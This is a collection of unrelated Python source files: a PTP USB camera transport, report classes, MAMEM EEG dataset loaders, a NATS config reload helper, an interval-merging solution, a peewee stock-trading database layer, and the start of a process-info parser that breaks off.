# number is implicit over USB.
self.__Param = Range(0, 5, self._Parameter)
self.__CommandTransactionBase = Struct(
Embedded(self.__CommandHeader),
'Payload' / Bytes(
lambda ctx, h=self.__Header: ctx.Length - h.sizeof()
)
)
self.__CommandTransaction = ExprAdapter(
self.__CommandTransactionBase,
encoder=lambda obj, ctx, h=self.__Header: Container(
Length=len(obj.Payload) + h.sizeof(),
**obj
),
decoder=lambda obj, ctx: obj,
)
self.__ResponseTransactionBase = Struct(
Embedded(self.__ResponseHeader),
'Payload' / Bytes(
lambda ctx, h=self.__Header: ctx.Length - h.sizeof())
)
self.__ResponseTransaction = ExprAdapter(
self.__ResponseTransactionBase,
encoder=lambda obj, ctx, h=self.__Header: Container(
Length=len(obj.Payload) + h.sizeof(),
**obj
),
decoder=lambda obj, ctx: obj,
)
def __parse_response(self, usbdata):
'''Helper method for parsing USB data.'''
# Build up container with all PTP info.
logger.debug('Transaction:')
usbdata = bytearray(usbdata)
if logger.isEnabledFor(logging.DEBUG):
for l in hexdump(
six.binary_type(usbdata[:512]),
result='generator'
):
logger.debug(l)
transaction = self.__ResponseTransaction.parse(usbdata)
response = Container(
SessionID=self.session_id,
TransactionID=transaction.TransactionID,
)
logger.debug('Interpreting {} transaction'.format(transaction.Type))
if transaction.Type == 'Response':
response['ResponseCode'] = transaction.ResponseCode
response['Parameter'] = self.__Param.parse(transaction.Payload)
elif transaction.Type == 'Event':
event = self.__EventHeader.parse(
usbdata[0:self.__Header.sizeof()]
)
response['EventCode'] = event.EventCode
response['Parameter'] = self.__Param.parse(transaction.Payload)
else:
command = self.__CommandHeader.parse(
usbdata[0:self.__Header.sizeof()]
)
response['OperationCode'] = command.OperationCode
response['Data'] = transaction.Payload
return response
def __recv(self, event=False, wait=False, raw=False):
'''Helper method for receiving data.'''
# TODO: clear stalls automatically
ep = self.__intep if event else self.__inep
lock = self.__intep_lock if event else self.__inep_lock
usbdata = array.array('B', [])
with lock:
tries = 0
# Attempt to read a header
while len(usbdata) < self.__Header.sizeof() and tries < 5:
if tries > 0:
logger.debug('Data smaller than a header')
logger.debug(
'Requesting {} bytes of data'
.format(ep.wMaxPacketSize)
)
try:
usbdata += ep.read(
ep.wMaxPacketSize
)
except usb.core.USBError as e:
# Return None on timeout or busy for events
if (
(e.errno is None and
('timeout' in e.strerror.decode() or
'busy' in e.strerror.decode())) or
(e.errno == 110 or e.errno == 16 or e.errno == 5)
):
if event:
return None
else:
logger.warning('Ignored exception: {}'.format(e))
else:
logger.error(e)
raise e
tries += 1
logger.debug('Read {} bytes of data'.format(len(usbdata)))
if len(usbdata) == 0:
if event:
return None
else:
raise PTPError('Empty USB read')
if (
logger.isEnabledFor(logging.DEBUG) and
len(usbdata) < self.__Header.sizeof()
):
logger.debug('Incomplete header')
for l in hexdump(
six.binary_type(bytearray(usbdata)),
result='generator'
):
logger.debug(l)
header = self.__ResponseHeader.parse(
bytearray(usbdata[0:self.__Header.sizeof()])
)
if header.Type not in ['Response', 'Data', 'Event']:
raise PTPError(
'Unexpected USB transfer type. '
'Expected Response, Event or Data but received {}'
.format(header.Type)
)
while len(usbdata) < header.Length:
usbdata += ep.read(
min(
header.Length - len(usbdata),
# Up to 64kB
64 * 2**10
)
)
if raw:
return usbdata
else:
return self.__parse_response(usbdata)
def __send(self, ptp_container, event=False):
'''Helper method for sending data.'''
ep = self.__intep if event else self.__outep
lock = self.__intep_lock if event else self.__outep_lock
transaction = self.__CommandTransaction.build(ptp_container)
with lock:
try:
sent = 0
while sent < len(transaction):
sent = ep.write(
# Up to 64kB
transaction[sent:(sent + 64*2**10)]
)
except usb.core.USBError as e:
# Ignore timeout or busy device once.
if (
(e.errno is None and
('timeout' in e.strerror.decode() or
'busy' in e.strerror.decode())) or
(e.errno == 110 or e.errno == 16 or e.errno == 5)
):
logger.warning('Ignored USBError {}'.format(e.errno))
ep.write(transaction)
def __send_request(self, ptp_container):
'''Send PTP request without checking answer.'''
# Don't modify original container to keep abstraction barrier.
ptp = Container(**ptp_container)
# Don't send unused parameters
try:
while not ptp.Parameter[-1]:
ptp.Parameter.pop()
if len(ptp.Parameter) == 0:
break
except IndexError:
# The Parameter list is already empty.
pass
# Send request
ptp['Type'] = 'Command'
ptp['Payload'] = self.__Param.build(ptp.Parameter)
self.__send(ptp)
def __send_data(self, ptp_container, data):
'''Send data without checking answer.'''
# Don't modify original container to keep abstraction barrier.
ptp = Container(**ptp_container)
# Send data
ptp['Type'] = 'Data'
ptp['Payload'] = data
self.__send(ptp)
@property
def _dev(self):
return None if self.__event_shutdown.is_set() else self.__dev
@_dev.setter
def _dev(self, value):
raise ValueError('Read-only property')
# Actual implementation
# ---------------------
def send(self, ptp_container, data):
'''Transfer operation with dataphase from initiator to responder'''
datalen = len(data)
logger.debug('SEND {} {} bytes{}'.format(
ptp_container.OperationCode,
datalen,
' ' + str(list(map(hex, ptp_container.Parameter)))
if ptp_container.Parameter else '',
))
with self.__transaction_lock:
self.__send_request(ptp_container)
self.__send_data(ptp_container, data)
# Get response and sneak in implicit SessionID and missing
# parameters.
response = self.__recv()
logger.debug('SEND {} {} bytes {}{}'.format(
ptp_container.OperationCode,
datalen,
response.ResponseCode,
' ' + str(list(map(hex, response.Parameter)))
if ptp_container.Parameter else '',
))
return response
def recv(self, ptp_container):
'''Transfer operation with dataphase from responder to initiator.'''
logger.debug('RECV {}{}'.format(
ptp_container.OperationCode,
' ' + str(list(map(hex, ptp_container.Parameter)))
if ptp_container.Parameter else '',
))
with self.__transaction_lock:
self.__send_request(ptp_container)
dataphase = self.__recv()
if hasattr(dataphase, 'Data'):
response = self.__recv()
if not (ptp_container.SessionID ==
dataphase.SessionID ==
response.SessionID):
self.__dev.reset()
raise PTPError(
'Dataphase session ID missmatch: {}, {}, {}.'
.format(
ptp_container.SessionID,
dataphase.SessionID,
response.SessionID
)
)
if not (ptp_container.TransactionID ==
dataphase.TransactionID ==
response.TransactionID):
self.__dev.reset()
raise PTPError(
'Dataphase transaction ID missmatch: {}, {}, {}.'
.format(
ptp_container.TransactionID,
dataphase.TransactionID,
response.TransactionID
)
)
if not (ptp_container.OperationCode ==
dataphase.OperationCode):
self.__dev.reset()
raise PTPError(
'Dataphase operation code missmatch: {}, {}.'.
format(
ptp_container.OperationCode,
dataphase.OperationCode
)
)
response['Data'] = dataphase.Data
else:
response = dataphase
logger.debug('RECV {} {}{}{}'.format(
ptp_container.OperationCode,
response.ResponseCode,
' {} bytes'.format(len(response.Data))
if hasattr(response, 'Data') else '',
' ' + str(list(map(hex, response.Parameter)))
if response.Parameter else '',
))
return response
def mesg(self, ptp_container):
'''Transfer operation without dataphase.'''
logger.debug('MESG {}{}'.format(
ptp_container.OperationCode,
' ' + str(list(map(hex, ptp_container.Parameter)))
if ptp_container.Parameter else '',
))
with self.__transaction_lock:
self.__send_request(ptp_container)
# Get response and sneak in implicit SessionID and missing
# parameters for FullResponse.
response = self.__recv()
logger.debug('MESG {} {}{}'.format(
ptp_container.OperationCode,
response.ResponseCode,
' ' + str(list(map(hex, response.Parameter)))
if response.Parameter else '',
))
return response
def event(self, wait=False):
'''Check event.
If `wait` this function is blocking. Otherwise it may return None.
'''
evt = None
usbdata = None
if wait:
usbdata = self.__event_queue.get(block=True)
elif not self.__event_queue.empty():
usbdata = self.__event_queue.get(block=False)
if usbdata is not None:
evt = self.__parse_response(usbdata)
return evt
def __poll_events(self):
'''Poll events, adding them to a queue.'''
while not self.__event_shutdown.is_set() and _main_thread_alive():
try:
evt = self.__recv(event=True, wait=False, raw=True)
if evt is not None:
logger.debug('Event queued')
self.__event_queue.put(evt)
except usb.core.USBError as e:
logger.error(
'{} polling exception: {}'.format(repr(self.__dev), e)
)
# check if disconnected
if e.errno == 19:
break
except Exception as e:
logger.error(
'{} polling exception: {}'.format(repr(self.__dev), e)
)
|
from typing import List, Any
from orun.views.generic.base import TemplateView
from .totals import Total
class Report(TemplateView):
def __init__(self):
super().__init__()
self.stream = []
def write(self, s: str):
pass
def write_line(self, s: str):
self.stream.append(s)
def prepare(self):
pass
def render_to_response(self, context, **response_kwargs):
self.prepare()
super().render_to_response(context, **response_kwargs)
class Column:
def __init__(self, name: str = None, auto_created=False, auto_size=None, length=-1):
self.name = name
class TabularReport(Report):
_report_format = 'text'
def __init__(self):
super().__init__()
self.columns: List[Column] = []
self.totals: List[Total] = []
self.report_format = self._report_format
@property
def report_format(self):
return self._report_format
@report_format.setter
def report_format(self, value):
self._report_format = value
if value == 'json':
self.content_type = 'application/json'
elif value == 'html':
self.content_type = 'text/html'
else:
self.content_type = 'text/plain'
def write_headers(self, headers: List[str]):
if not self.columns:
for header in headers:
self.columns.append(Column(header, auto_created=True))
def _write_cell(self, col: Column, val: Any):
pass
def write_row(self, cells: List):
if not self.columns:
for cell in cells:
self.columns.append(Column(auto_created=True))
for col, cell in zip(self.columns, cells):
self._write_cell(col, cell)
class PaginatedReport(Report):
content_type = 'application/json'
_report_format = 'json'
@property
def report_format(self):
return self._report_format
@report_format.setter
def report_format(self, value):
self._report_format = value
if value == 'json':
self.content_type = 'application/json'
elif value == 'html':
self.content_type = 'text/html'
|
"""SSVEP MAMEM1 dataset."""
import logging
import os.path as osp
import numpy as np
import pooch
from mne import create_info
from mne.channels import make_standard_montage
from mne.io import RawArray
from scipy.io import loadmat
from .base import BaseDataset
from .download import (
fs_get_file_hash,
fs_get_file_id,
fs_get_file_list,
fs_get_file_name,
get_dataset_path,
)
log = logging.getLogger(__name__)
MAMEM_URL = "https://ndownloader.figshare.com/files/"
# Specific release
# MAMEM1_URL = 'https://ndownloader.figshare.com/articles/2068677/versions/6'
# MAMEM2_URL = 'https://ndownloader.figshare.com/articles/3153409/versions/4'
# MAMEM3_URL = 'https://ndownloader.figshare.com/articles/3413851/versions/3'
# Alternate Download Location
# MAMEM1_URL = "https://archive.physionet.org/physiobank/database/mssvepdb/dataset1/"
# MAMEM2_URL = "https://archive.physionet.org/physiobank/database/mssvepdb/dataset2/"
# MAMEM3_URL = "https://archive.physionet.org/physiobank/database/mssvepdb/dataset3/"
def mamem_event(eeg, dins, labels=None):
"""Convert DIN field into events.
Code adapted from
https://github.com/MAMEM/eeg-processing-toolbox
"""
thres_split = 2000
timestamps = dins[1, :]
samples = dins[3, :]
numDins = dins.shape[1]
sampleA = samples[0]
previous = timestamps[0]
t_start, freqs = [], []
s, c = 0, 0
for i in range(1, numDins):
current = timestamps[i]
if (current - previous) > thres_split:
sampleB = samples[i - 1]
freqs.append(s // c)
if (sampleB - sampleA) > 382:
t_start.append(sampleA)
sampleA = samples[i]
s = 0
c = 0
else:
s = s + (current - previous)
c = c + 1
previous = timestamps[i]
sampleB = samples[i - 1]
freqs.append(s // c)
t_start.append(sampleA)
freqs = np.array(freqs, dtype=int) * 2
freqs = 1000 // freqs
t_start = np.array(t_start)
if labels is None:
freqs_labels = {6: 1, 7: 2, 8: 3, 9: 4, 11: 5}
for f, t in zip(freqs, t_start):
eeg[-1, t] = freqs_labels[f]
else:
for f, t in zip(labels, t_start):
eeg[-1, t] = f
return eeg
class BaseMAMEM(BaseDataset):
"""Base class for MAMEM datasets."""
def __init__(self, events, sessions_per_subject, code, doi, figshare_id):
super().__init__(
subjects=list(range(1, 11)),
events=events,
interval=[1, 4],
paradigm="ssvep",
sessions_per_subject=sessions_per_subject,
code=code,
doi=doi,
)
self.figshare_id = figshare_id
def _get_single_subject_data(self, subject):
"""Return data for a single subject."""
fnames = self.data_path(subject)
filelist = fs_get_file_list(self.figshare_id)
fsn = fs_get_file_name(filelist)
sessions = {}
for fpath in fnames:
fnamed = fsn[osp.basename(fpath)]
if fnamed[4] == "x":
continue
session_name = "session_0"
if self.code == "MAMEM3":
repetition = len(fnamed) - 10
run_name = f"run_{(ord(fnamed[4]) - 97) * 2 + repetition}"
else:
run_name = f"run_{ord(fnamed[4]) - 97}"
if self.code == "MAMEM3":
m = loadmat(fpath)
ch_names = [e[0] for e in m["info"][0, 0][9][0]]
sfreq = 128
montage = make_standard_montage("standard_1020")
eeg = m["eeg"]
else:
m = loadmat(fpath, squeeze_me=True)
ch_names = [f"E{i + 1}" for i in range(0, 256)]
ch_names.append("stim")
sfreq = 250
if self.code == "MAMEM2":
labels = m["labels"]
else:
labels = None
eeg = mamem_event(m["eeg"], m["DIN_1"], labels=labels)
montage = make_standard_montage("GSN-HydroCel-256")
ch_types = ["eeg"] * (len(ch_names) - 1) + ["stim"]
info = create_info(ch_names, sfreq, ch_types)
raw = RawArray(eeg, info, verbose=False)
raw.set_montage(montage)
if session_name not in sessions.keys():
sessions[session_name] = {}
if len(sessions[session_name]) == 0:
sessions[session_name] = {run_name: raw}
else:
sessions[session_name][run_name] = raw
return sessions
def data_path(
self, subject, path=None, force_update=False, update_path=None, verbose=None
):
if subject not in self.subject_list:
raise (ValueError("Invalid subject number"))
sub = f"{subject:02d}"
sign = self.code.split("-")[0]
key_dest = f"MNE-{sign.lower():s}-data"
path = osp.join(get_dataset_path(sign, path), key_dest)
filelist = fs_get_file_list(self.figshare_id)
reg = fs_get_file_hash(filelist)
fsn = fs_get_file_id(filelist)
gb = pooch.create(path=path, base_url=MAMEM_URL, registry=reg)
spath = []
for f in fsn.keys():
if f[2:4] == sub:
spath.append(gb.fetch(fsn[f]))
return spath
class MAMEM1(BaseMAMEM):
"""SSVEP MAMEM 1 dataset.
.. admonition:: Dataset summary
====== ======= ======= ========== ================= =============== =============== ===========
Name #Subj #Chan #Classes #Trials / class Trials length Sampling rate #Sessions
====== ======= ======= ========== ================= =============== =============== ===========
MAMEM1 10 256 5 12-15 3s 250Hz 1
====== ======= ======= ========== ================= =============== =============== ===========
Dataset from [1]_.
EEG signals with 256 channels captured from 11 subjects executing a
SSVEP-based experimental protocol. Five different frequencies
(6.66, 7.50, 8.57, 10.00 and 12.00 Hz) have been used for the visual
stimulation,and the EGI 300 Geodesic EEG System, using a
stimulation, HydroCel Geodesic Sensor Net (HCGSN) and a sampling rate of
250 Hz has been used for capturing the signals.
Check the technical report [2]_ for more detail.
From [1]_, subjects were exposed to non-overlapping flickering lights from five
magenta boxes with frequencies [6.66Hz, 7.5Hz, 8.57Hz 10Hz and 12Hz].
256 channel EEG recordings were captured.
Each session of the experimental procedure consisted of the following:
1. 100 seconds of rest.
2. An adaptation period in which the subject is exposed to eight
5 second windows of flickering from a magenta box. Each flickering
window is of a single isolated frequency, randomly chosen from the
above set, specified in the FREQUENCIES1.txt file under
'adaptation'. The individual flickering windows are separated by 5
seconds of rest.
3. 30 seconds of rest.
4. For each of the frequencies from the above set in ascending order,
also specified in FREQUENCIES1.txt under 'main trials':
1. Three 5 second windows of flickering at the chosen frequency,
separated by 5 seconds of rest.
2. 30 seconds of rest.
This gives a total of 15 flickering windows, or 23 including the
adaptation period.
The order of chosen frequencies is the same for each session, although
there are small-moderate variations in the actual frequencies of each
individual window. The .freq annotations list the different frequencies at
a higher level of precision.
**Note**: Each 'session' in experiment 1 includes an adaptation period, unlike
experiment 2 and 3 where each subject undergoes only one adaptation period
before their first 'session'.
From [3]_:
**Eligible signals**: The EEG signal is sensitive to external factors that have
to do with the environment or the configuration of the acquisition setup
The research stuff was responsible for the elimination of trials that were
considered faulty. As a result the following sessions were noted and
excluded from further analysis:
1. S003, during session 4 the stimulation program crashed
2. S004, during session 2 the stimulation program crashed, and
3. S008, during session 4 the Stim Tracker was detuned.
Furthermore, we must also note that subject S001 participated in 3 sessions
and subjects S003 and S004 participated in 4 sessions, compared to all
other subjects that participated in 5 sessions (NB: in fact, there is only
3 sessions for subjects 1, 3 and 8, and 4 sessions for subject 4 available
to download). As a result, the utilized dataset consists of 1104 trials of
5 seconds each.
**Flickering frequencies**: Usually the refresh rate for an LCD Screen is 60 Hz
creating a restriction to the number of frequencies that can be selected.
Specifically, only the frequencies that when divided with the refresh rate
of the screen result in an integer quotient could be selected. As a result,
the frequendies that could be obtained were the following: 30.00. 20.00,
15.00, 1200, 10.00, 857. 7.50 and 6.66 Hz. In addition, it is also
important to avoid using frequencies that are multiples of another
frequency, for example making the choice to use 10.00Hz prohibits the use
of 20.00 and 30.00 Mhz. With the previously described limitations in mind,
the selected frequencies for the experiment were: 12.00, 10.00, 8.57, 7.50
and 6.66 Hz.
**Stimuli Layout**: In an effort to keep the experimental process as simple as
possible, we used only one flickering box instead of more common choices,
such as 4 or 5 boxes flickering simultaneously The fact that the subject
could focus on one stimulus without having the distraction of other
flickering sources allowed us to minimize the noise of our signals and
verify the appropriateness of our acquisition setup Nevertheless, having
concluded the optimal configuration for analyzing the EEG signals, the
experiment will be repeated with more concurrent visual stimulus.
**Trial duration**: The duration of each trial was set to 5 seconds, as this
time was considered adequate to allow the occipital part of the bran to
mimic the stimulation frequency and still be small enough for making a
selection in the context
References
----------
.. [1] MAMEM Steady State Visually Evoked Potential EEG Database
`<https://archive.physionet.org/physiobank/database/mssvepdb/>`_
.. [2] V.P. Oikonomou et al, 2016, Comparative evaluation of state-of-the-art
algorithms for SSVEP-based BCIs. arXiv.
`<http://arxiv.org/abs/1602.00904>`-
.. [3] S. Nikolopoulos, 2016, DataAcquisitionDetails.pdf
`<https://figshare.com/articles/dataset/MAMEM_EEG_SSVEP_Dataset_I_256_channels_11_subjects_5_frequencies_/2068677?file=3793738>`_ # noqa: E501
"""
def __init__(self):
super().__init__(
events={"6.66": 1, "7.50": 2, "8.57": 3, "10.00": 4, "12.00": 5},
sessions_per_subject=1,
# 5 runs per sessions, except 3 for S001, S003, S008, 4 for S004
code="MAMEM1",
doi="https://arxiv.org/abs/1602.00904",
figshare_id=2068677,
)
class MAMEM2(BaseMAMEM):
"""SSVEP MAMEM 2 dataset.
.. admonition:: Dataset summary
====== ======= ======= ========== ================= =============== =============== ===========
Name #Subj #Chan #Classes #Trials / class Trials length Sampling rate #Sessions
====== ======= ======= ========== ================= =============== =============== ===========
MAMEM2 10 256 5 20-30 3s 250Hz 1
====== ======= ======= ========== ================= =============== =============== ===========
Dataset from [1]_.
EEG signals with 256 channels captured from 11 subjects executing a
SSVEP-based experimental protocol. Five different frequencies
(6.66, 7.50, 8.57, 10.00 and 12.00 Hz) have been used for the visual
stimulation,and the EGI 300 Geodesic EEG System, using a
stimulation, HydroCel Geodesic Sensor Net (HCGSN) and a sampling rate of
250 Hz has been used for capturing the signals.
Subjects were exposed to flickering lights from five violet boxes with
frequencies [6.66Hz, 7.5Hz, 8.57Hz, 10Hz, and 12Hz] simultaneously. Prior
to and during each flicking window, one of the boxes is marked by a yellow
arrow indicating the box to be focused on by the subject. 256 channel EEG
recordings were captured.
From [2]_, each subject underwent a single adaptation period before the first of
their 5 sessions (unlike experiment 1 in which each session began with its own
adaptation period). In the adaptation period, the subject is exposed to ten
5-second flickering windows from the five boxes simultaneously, with the
target frequencies specified in the FREQUENCIES2.txt file under
'adaptation'. The flickering windows are separated by 5 seconds of rest,
and the 100s adaptation period precedes the first session by 30 seconds.
Each session consisted of the following:
For the series of frequencies specified in the FREQUENCIES2.txt file under
'sessions':
A 5 second window with all boxes flickering and the subject focusing
on the specified frequency's marked box, followed by 5 seconds of rest.
This gives a total of 25 flickering windows for each session (not
including the first adaptation period). Five minutes of rest before
the next session (not including the 5th session).
The order of chosen frequencies is the same for each session, although
there are small-moderate variations in the actual frequencies of each
individual window.
**Note**: Each 'session' in experiment 1 includes an adaptation period,
unlike experiment 2 and 3 where each subject undergoes only one adaptation
period before their first 'session'.
**Waveforms and Annotations**
File names are in the form T0NNn, where NN is the subject number and n is
a - e for the session letter or x for the adaptation period. Each session
lasts in the order of several minutes and is sampled at 250Hz. Each session
and adaptation period has the following files:
A waveform file of the EEG signals (.dat) along with its header file
(.hea). If the channel corresponds to an international 10-20 channel then
it is labeled as such. Otherwise, it is just labeled 'EEG'. An annotation
file (.flash) containing the locations of each individual flash. An
annotation file (.win) containing the locations of the beginning and end
of each 5 second flickering window. The annotations are labeled as '(' for
start and ')' for stop, along with auxiliary strings indicating the focal
frequency of the flashing windows.
The FREQUENCIES2.txt file indicates the approximate marked frequencies of
the flickering windows, equal for each session, adaptation, and subject.
These values are equal to those contained in the .win annotations.
**Observed artifacts:**
During the stimulus presentation to subject S007 the research stuff
noted that the subject had a tendency to eye blink. As a result the
interference, in matters of artifacts, on the recorded signal is expected
to be high.
References
----------
.. [1] MAMEM Steady State Visually Evoked Potential EEG Database
`<https://archive.physionet.org/physiobank/database/mssvepdb/>`_
.. [2] S. Nikolopoulos, 2016, DataAcquisitionDetails.pdf
`<https://figshare.com/articles/dataset/MAMEM_EEG_SSVEP_Dataset_II_256_channels_11_subjects_5_frequencies_presented_simultaneously_/3153409?file=4911931>`_ # noqa: E501
"""
def __init__(self):
super().__init__(
events={"6.66": 1, "7.50": 2, "8.57": 3, "10.00": 4, "12.00": 5},
sessions_per_subject=1,
code="MAMEM2",
doi="https://arxiv.org/abs/1602.00904",
figshare_id=3153409,
)
class MAMEM3(BaseMAMEM):
"""SSVEP MAMEM 3 dataset.
.. admonition:: Dataset summary
====== ======= ======= ========== ================= =============== =============== ===========
Name #Subj #Chan #Classes #Trials / class Trials length Sampling rate #Sessions
====== ======= ======= ========== ================= =============== =============== ===========
MAMEM3 10 14 4 20-30 3s 128Hz 1
====== ======= ======= ========== ================= =============== =============== ===========
Dataset from [1]_.
EEG signals with 14 channels captured from 11 subjects executing a
SSVEP-based experimental protocol. Five different frequencies
(6.66, 7.50, 8.57, 10.00 and 12.00 Hz) have been used for the visual
stimulation, and the Emotiv EPOC, using 14 wireless channels has been used
for capturing the signals.
Subjects were exposed to flickering lights from five magenta boxes with
frequencies [6.66Hz, 7.5Hz, 8.57Hz, 10Hz and 12Hz] simultaneously. Prior
to and during each flicking window, one of the boxes is marked by a yellow
arrow indicating the box to be focused on by the subject. The Emotiv EPOC
14 channel wireless EEG headset was used to capture the subjects' signals.
Each subject underwent a single adaptation period before the first of their
5 sessions (unlike experiment 1 in which each session began with its own
adaptation period). In the adaptation period, the subject is exposed to ten
5-second flickering windows from the five boxes simultaneously, with the
target frequencies specified in the FREQUENCIES3.txt file under
'adaptation'. The flickering windows are separated by 5 seconds of rest,
and the 100s adaptation period precedes the first session by 30 seconds.
Each session consisted of the following:
For the series of frequencies specified in the FREQUENCIES3.txt file under
'sessions':
A 5 second window with all boxes flickering and the subject focusing on
the specified frequency's marked box, followed by 5 seconds of rest.
Between the 12th and 13th flickering window, there is a 30s resting
period. This gives a total of 25 flickering windows for each session
(not including the first adaptation period). Five minutes of rest
before the next session (not including the 5th session).
The order of chosen frequencies is the same for each session, although
there are small-moderate variations in the actual frequencies of each
individual window.
**Note**: Each 'session' in experiment 1 includes an adaptation period, unlike
experiment 2 and 3 where each subject undergoes only one adaptation period
before their first 'session' [2]_.
**Waveforms and Annotations**
File names are in the form U0NNn, where NN is the subject number and n is
a - e for the session letter or x for the adaptation period. In addition,
session file names end with either i or ii, corresponding to the first 12
or second 13 windows of the session respectively. Each session lasts in the
order of several minutes and is sampled at 128Hz.
Each session half and adaptation period has the following files:
A waveform file of the EEG signals (.dat) along with its header file
(.hea). An annotation file (.win) containing the locations of the beginning
and end of each 5 second flickering window. The annotations are labeled as
'(' for start and ')' for stop, along with auxiliary strings indicating the
focal frequency of the flashing windows.
The FREQUENCIES3.txt file indicates the approximate marked frequencies of
the flickering windows, equal for each session, adaptation, and subject.
These values are equal to those contained in the .win annotations.
**Trial manipulation**:
The trial initiation is defined by an event code (32779) and the
end by another (32780). There are five different labels that indicate the
box subjects were instructed to focus on (1, 2, 3, 4 and 5) and
correspond to frequencies 12.00, 10.00, 8.57, 7.50 and 6.66 Hz respectively.
5 3 2 1 4 5 2 1 4 3 is the trial sequence for the adaptation and
4 2 3 5 1 2 5 4 2 3 1 5 4 3 2 4 1 2 5 3 4 1 3 1 3 is the sequence for each
session.
**Observed artifacts**:
During the stimulus presentation to subject S007 the research staff
noted that the subject had a tendency to eye blink. As a result the
interference, in matters of artifacts, on the recorded signal is expected
to be high.
References
----------
.. [1] MAMEM Steady State Visually Evoked Potential EEG Database
`<https://archive.physionet.org/physiobank/database/mssvepdb/>`_
.. [2] S. Nikolopoulos, 2016, DataAcquisitionDetails.pdf
`<https://figshare.com/articles/dataset/MAMEM_EEG_SSVEP_Dataset_III_14_channels_11_subjects_5_frequencies_presented_simultaneously_/3413851>`_ # noqa: E501
"""
def __init__(self):
super().__init__(
events={
"6.66": 33029,
"7.50": 33028,
"8.57": 33027,
"10.00": 33026,
"12.00": 33025,
},
sessions_per_subject=1,
code="MAMEM3",
doi="https://arxiv.org/abs/1602.00904",
figshare_id=3413851,
)
|
import json
import os
import subprocess
from loguru import logger
from django.conf import settings
from rest_framework import status
from rest_framework.response import Response
from agents.models import Agent
logger.configure(**settings.LOG_CONFIG)
notify_error = lambda msg: Response(msg, status=status.HTTP_400_BAD_REQUEST)
def reload_nats():
users = [{"user": "tacticalrmm", "password": settings.SECRET_KEY}]
agents = Agent.objects.prefetch_related("user").only("pk", "agent_id")
for agent in agents:
try:
users.append(
{"user": agent.agent_id, "password": agent.user.auth_token.key}
)
except:
logger.critical(
f"{agent.hostname} does not have a user account, NATS will not work"
)
if not settings.DOCKER_BUILD:
domain = settings.ALLOWED_HOSTS[0].split(".", 1)[1]
cert_path = f"/etc/letsencrypt/live/{domain}"
else:
cert_path = "/opt/tactical/certs"
config = {
"tls": {
"cert_file": f"{cert_path}/fullchain.pem",
"key_file": f"{cert_path}/privkey.pem",
},
"authorization": {"users": users},
"max_payload": 2048576005,
}
conf = os.path.join(settings.BASE_DIR, "nats-rmm.conf")
with open(conf, "w") as f:
json.dump(config, f)
if not settings.DOCKER_BUILD:
subprocess.run(
["/usr/local/bin/nats-server", "-signal", "reload"], capture_output=True
)
|
from operator import itemgetter
class Solution:
def merge(self, intervals: List[List[int]]) -> List[List[int]]:
intervals.sort(key=itemgetter(0))
interval_dict = {}
for start, end in intervals:
# Find closet
closest_start = None
for k in interval_dict:
if k <= start:
if closest_start is None or closest_start < k:
closest_start = k
if closest_start is None:
closest_start = start
interval_dict.setdefault(closest_start, end)
istart, iend = closest_start, interval_dict[closest_start]
if iend >= start:
interval_dict[closest_start] = max(iend, end)
else:
interval_dict[start] = end
return [list(i) for i in interval_dict.items()]
|
from peewee import *
from typing import List
from datetime import date
from dynaconf import settings
from investagram_data_loader.logger import logging
from investagram_data_loader.repository.base_dao import BaseDao
class Stock(Model):
stock_id = IntegerField(primary_key=True)
stock_code = CharField(max_length=20, index=True)
stock_name = CharField()
exchange_type = CharField()
exchange_string = CharField()
stock_code_and_exchange = CharField()
sector_string = CharField()
subsector_string = CharField()
is_active = BooleanField()
stock_type = IntegerField()
stock_category = CharField()
stock_category_id = IntegerField()
class Broker(Model):
stock_broker_id = IntegerField(primary_key=True, db_column='broker_id')
exchange_type = IntegerField()
broker_name = CharField()
broker_classification = IntegerField()
broker_status = IntegerField()
broker_code = CharField(index=True)
broker_number = IntegerField()
broker_status_name = CharField()
broker_classification_name = CharField()
class Transaction(Model):
stock_id = ForeignKeyField(Stock, db_column='stock_id')
broker_id = ForeignKeyField(Broker, to_field='stock_broker_id', db_column='broker_id')
stock_code = CharField()
stock_name = CharField()
broker_code = CharField()
date = DateField(index=True)
buy_volume = IntegerField()
buy_value = FloatField()
buy_ave_price = FloatField()
buy_market_val_percent = FloatField()
buy_trade_count = IntegerField()
sell_volume = IntegerField()
sell_value = FloatField()
sell_ave_price = FloatField()
sell_market_val_percent = FloatField()
sell_trade_count = IntegerField()
net_volume = IntegerField()
net_value = FloatField()
total_volume = IntegerField()
total_value = IntegerField()
# singleton instance
class SqliteDao(BaseDao):
models = [Stock, Broker, Transaction]
_instance = None
def __new__(cls, *args, **kwargs):
if cls._instance is None:
cls._instance = object.__new__(cls)
return cls._instance
def __init__(self):
self._database = SqliteDatabase(settings.DATABASE_FILE)
self._set_db_on_models()
self._setup()
def _setup(self):
self._database.connect(reuse_if_open=True)
self._database.create_tables(SqliteDao.models)
def _set_db_on_models(self):
for model in SqliteDao.models:
model._meta.database = self._database
def insert_stock(self, data: Stock) -> int:
num_inserted = data.save()
logging.info(f'Inserted {num_inserted} records into stock table.')
return num_inserted
def insert_broker(self, data: Broker) -> int:
num_inserted = data.save()
logging.info(f'Inserted {num_inserted} records into broker table.')
return num_inserted
def bulk_insert_transactions(self, transactions: List[Transaction]):
with self._database.atomic():
Transaction.bulk_create(transactions, batch_size=25)
logging.info(f'Inserted {len(transactions)} transaction records in the database.')
def get_transactions_by_stock_code(self, stock_code: str, from_date: date, to_date: date):
filters = [
Transaction.stock_code == stock_code,
Transaction.date >= from_date,
Transaction.date <= to_date
]
iterator = Transaction.select().where(*filters)
return iterator
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
logging.info("Closing the database handle...")
self._database.close()
def upsert_stock(stock_getter):
dao = SqliteDao()
def wrapper(_self, stock_code: str):
try:
logging.info(f"Retrieving {stock_code} stock data from database..")
entry = Stock.get(Stock.stock_code == stock_code)
return entry
except DoesNotExist:
logging.info(f'{stock_code} data not found in database, querying the api...')
stock_info = stock_getter(_self, stock_code)
dao.insert_stock(stock_info)
return stock_info
return wrapper
def upsert_broker(broker_getter):
dao = SqliteDao()
def wrapper(_self, broker_code: str):
try:
logging.info(f"Retrieving {broker_code} broker data from database..")
entry = Broker.get(Broker.broker_code == broker_code)
return entry
except DoesNotExist:
logging.info(f'{broker_code} data not found in database, querying the api...')
broker_info = broker_getter(_self, broker_code)
dao.insert_broker(broker_info)
return broker_info
return wrapper
|
import os
import subprocess
from process_handle import ProcessHandle, ProcessHandleParserBase
class ProcessHandlersPs(object):
@staticmethod
def handle_mem(_, value):
return value * 1024
@staticmethod
def handle_elapsed(_, value):
seconds = 0
unpack = value.split('-')
